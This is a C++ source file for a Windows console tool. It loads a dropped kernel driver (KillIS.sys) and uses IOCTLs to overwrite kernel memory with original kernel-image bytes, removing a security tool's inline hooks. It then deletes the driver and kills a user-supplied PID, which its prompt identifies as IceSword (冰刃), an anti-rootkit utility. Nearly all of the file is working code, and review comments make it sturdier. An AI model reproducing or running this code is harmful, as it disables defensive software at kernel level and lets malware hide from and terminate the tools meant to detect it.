// InlineReHOOK.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "NtQuerySystemInformation.h"
#include "Driver.h"
#include "resource.h"
#include "ObjectKill.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <windows.h>
#include <winioctl.h>

//Link Device
#define IOCTL_GETADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS)

PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount);
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount);

HANDLE hDevice;

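// Entry point. Loads C:\KillIS.sys (LoadDriver), asks the driver for a kernel
// address via IOCTL_GETADDR_CONTROL, restores the original bytes at that
// address (PatchHighMemory), unloads and deletes the driver, then calls
// ObjectKill on a PID read from stdin.
//
// Returns 0 on the normal path, 1 if the driver cannot be loaded, the address
// query fails, or no PID could be read.
int main(int argc, char* argv[])
{
	char	DeviceRet[25];
	DWORD	ReBytes = 0;	// bytes the driver returned through DeviceIoControl
	ULONG	NtAddr;
	ULONG	ByteCount;

	FreeSYS();
	hDevice = LoadDriver("C:\\KillIS.sys");
	// NOTE(review): LoadDriver is declared in Driver.h; whether it signals
	// failure with NULL or INVALID_HANDLE_VALUE is not visible here, so both
	// are treated as failure. Continuing with a bad handle would leave
	// DeviceRet all zeros and feed address 0 to PatchHighMemory.
	if (hDevice == NULL || hDevice == INVALID_HANDLE_VALUE)
	{
		printf("LoadDriver failed\n");
		return 1;
	}

	// Zero the whole buffer, not just the first 4 bytes: the reply is parsed
	// with atol(), which needs a NUL terminator after whatever the driver
	// wrote into the 4-byte output area.
	memset(DeviceRet, 0, sizeof(DeviceRet));
	if (!DeviceIoControl(hDevice, IOCTL_GETADDR_CONTROL, 0, 0, DeviceRet, 4, &ReBytes, NULL))
	{
		printf("IOCTL_GETADDR_CONTROL failed: %lu\n", (unsigned long)GetLastError());
		UnloadDriver(hDevice);
		DeleteFile("C:\\KillIS.sys");
		return 1;
	}

	// NOTE(review): the reply is parsed as an ASCII decimal string, but the
	// output buffer handed to the driver is only 4 bytes, which cannot hold a
	// 32-bit address in decimal. Confirm the reply format against KillIS.sys
	// before relying on NtAddr.
	NtAddr = (ULONG)atol(DeviceRet);
	ByteCount = 10;		// number of bytes to restore at NtAddr (hard-coded)

	PatchHighMemory((LONG)NtAddr, (LONG)ByteCount);

	UnloadDriver(hDevice);
	DeleteFile("C:\\KillIS.sys");

	// pid is initialised and the scanf result checked so a failed read cannot
	// hand an indeterminate PID to ObjectKill.
	LONG pid = 0;
	printf("\n请输入冰刃的PID值:");
	if (scanf("%ld", &pid) != 1)
	{
		printf("\ninvalid PID\n");
		return 1;
	}
	ObjectKill(pid);

	return 0;
}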

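// Write the original on-disk kernel bytes back over NtBeginAddr through the
// driver. The three IOCTLs must stay in this order: the driver first records
// the target address and byte count, and the final IOCTL_INPUTCODE_CONTROL
// both supplies the bytes and performs the write (per the original comments).
//
// NtBeginAddr    - kernel virtual address to restore.
// KrnlByteCount  - number of bytes to restore; must be positive.
//
// Terminates the process (exit status 1) if the original bytes cannot be
// recovered; the global hDevice is unloaded first because main() never gets
// the chance to do it once we exit.
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount)
{
	DWORD	ReBytes = 0;	// bytes returned by DeviceIoControl (required, unused)
	PUCHAR	Code;

	// %08lX matches a 32-bit LONG; the previous %0.8X expected unsigned int.
	printf("高位内存起始地址:0x%08lX	数目:0x%08lX\n",
	       (unsigned long)NtBeginAddr, (unsigned long)KrnlByteCount);

	// A negative count would become a huge size_t in the IOCTL below.
	if (KrnlByteCount <= 0)
	{
		printf("\ninvalid byte count\n");
		UnloadDriver(hDevice);
		exit(1);
	}

	Code = GetNTOriCode((ULONG)NtBeginAddr, (ULONG)KrnlByteCount);
	if (!Code)
	{
		printf("\ncannot recover original bytes\n");
		UnloadDriver(hDevice);
		exit(1);
	}

	printf("开始反补丁");

	// Short-circuit: if the address or count could not be handed to the
	// driver, do not trigger the write with stale driver-side state.
	BOOL ok = DeviceIoControl(hDevice, IOCTL_INPUTADDR_CONTROL, &NtBeginAddr, sizeof(NtBeginAddr), 0, 0, &ReBytes, NULL)
	       && DeviceIoControl(hDevice, IOCTL_INPUTBYTECOUNT_CONTROL, &KrnlByteCount, sizeof(KrnlByteCount), 0, 0, &ReBytes, NULL)
	       && DeviceIoControl(hDevice, IOCTL_INPUTCODE_CONTROL, Code, (DWORD)KrnlByteCount * sizeof(UCHAR), 0, 0, &ReBytes, NULL);
	if (!ok)
		printf("\nDeviceIoControl failed: %lu\n", (unsigned long)GetLastError());

	free(Code);	// GetNTOriCode returns a malloc'd buffer owned by the caller
}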


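// Read ByteCount bytes of the kernel image as it is on disk, at the RVA that
// NTBeginKrnlAddress has inside the first module reported by
// NtQuerySystemInformation(SystemModuleInfo). The bytes are taken from a fresh
// LoadLibraryEx(DONT_RESOLVE_DLL_REFERENCES) mapping of that module's file, so
// they are the unpatched originals rather than what is currently in kernel
// memory.
//
// NTBeginKrnlAddress - kernel virtual address inside the first module.
// ByteCount          - number of bytes to copy; 0 is treated as an error.
//
// Returns a malloc'd buffer of ByteCount bytes that the caller must free(), or
// NULL if ntdll/NtQuerySystemInformation cannot be resolved, the module list
// cannot be queried, [addr, addr+ByteCount) is not inside the first module, or
// the image cannot be mapped.
//
// NOTE(review): the first list entry (pModInfo->smi) is assumed to be the
// kernel executable; confirm against PSYSMODULELIST in
// NtQuerySystemInformation.h. The user-mode mapping is relocated to its own
// load address, so any absolute pointer inside the copied range would differ
// from the kernel's value; presumably the range is code, not data - verify
// for the address actually used.
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount)
{
	HINSTANCE hNTDll;
	LONG nStatus;			// NTSTATUS is signed; the old ULONG "< 0" test could never fire
	ULONG nRet = 0;
	ULONG nQuerySize = 0;
	ULONG rva = 0;
	PSYSMODULELIST pModInfo = NULL;
	HMODULE hKernel = NULL;
	PUCHAR buf = NULL;

	if (ByteCount == 0)
		return NULL;

	// Resolve NtQuerySystemInformation from ntdll (always mapped in a Win32
	// process, so the FreeLibrary below does not unmap it).
	hNTDll = LoadLibrary("ntdll");
	if (!hNTDll)
		return NULL;
	NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(hNTDll, "NtQuerySystemInformation");
	FreeLibrary(hNTDll);
	if (!NtQuerySystemInformation)
		return NULL;

	// First call only sizes the buffer (it is expected to fail with a length
	// mismatch and fill nQuerySize); the second call fills it.
	NtQuerySystemInformation(SystemModuleInfo, NULL, 0, &nQuerySize);
	if (nQuerySize == 0)
		return NULL;
	pModInfo = (PSYSMODULELIST)malloc(nQuerySize);
	if (!pModInfo)
		return NULL;
	nStatus = (LONG)NtQuerySystemInformation(SystemModuleInfo, pModInfo, nQuerySize, &nRet);
	if (nStatus < 0)
	{
		free(pModInfo);
		return NULL;
	}

	{
		ULONG base = (ULONG)pModInfo->smi->Base;
		ULONG size = (ULONG)pModInfo->smi->Size;
		// The whole [addr, addr+ByteCount) range must lie inside the module;
		// the old check only rejected addresses past the module's end.
		if (NTBeginKrnlAddress < base
		    || NTBeginKrnlAddress - base >= size
		    || ByteCount > size - (NTBeginKrnlAddress - base))
		{
			free(pModInfo);
			return NULL;
		}
		rva = NTBeginKrnlAddress - base;	// offset within the mapped image, not a file offset
		// ImageName + ModuleNameOffset is the bare file name, so LoadLibraryEx
		// resolves it through the normal DLL search path.
		hKernel = LoadLibraryEx(pModInfo->smi->ImageName + pModInfo->smi->ModuleNameOffset, 0, DONT_RESOLVE_DLL_REFERENCES);
	}
	free(pModInfo);
	pModInfo = NULL;
	if (!hKernel)
		return NULL;

	buf = (PUCHAR)malloc(ByteCount);
	if (buf)
		memcpy(buf, (PUCHAR)hKernel + rva, ByteCount);	// pointer arithmetic, no ULONG truncation
	FreeLibrary(hKernel);

	return buf;
}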
